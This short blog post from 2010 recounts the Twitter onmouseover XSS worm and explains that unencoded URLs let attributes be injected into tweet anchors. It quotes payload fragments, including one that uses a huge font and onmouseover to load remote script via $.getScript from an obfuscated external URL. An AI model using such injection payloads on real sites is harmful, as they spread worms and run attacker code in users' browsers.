Inspired? No home

XSS vulnerability on

So Judofyr found a XSS-exploit on and within minutes it spreaded like wildfire. His original tweet just set the anchor background color to black but his next tweet included onmouseover and people could not stop moving the mouse over the tweet resulting in over 40000 tweets within 10 minutes.

The exploit:"style="background:#000;color:#000;/

So Twitter does not encode the URL and whatever is after the @ gets included in the anchor. So css and javascript can be included.

Shortly after someone else created a more evil approach:"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\\u002ffl9A ...

Written on 21 September 2010.
blog comments powered by Disqus